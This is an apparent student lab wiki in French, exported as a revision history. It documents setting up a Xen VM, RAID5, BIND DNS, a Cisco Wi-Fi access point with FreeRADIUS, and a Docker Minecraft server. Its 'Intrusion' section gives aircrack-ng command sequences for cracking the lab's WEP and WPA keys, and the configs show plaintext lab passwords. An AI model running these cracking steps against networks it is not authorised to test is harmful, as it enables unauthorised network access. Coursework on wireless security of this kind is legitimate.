 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60263</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60263"/>
				<updated>2022-11-28T23:32:35Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Machine Virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
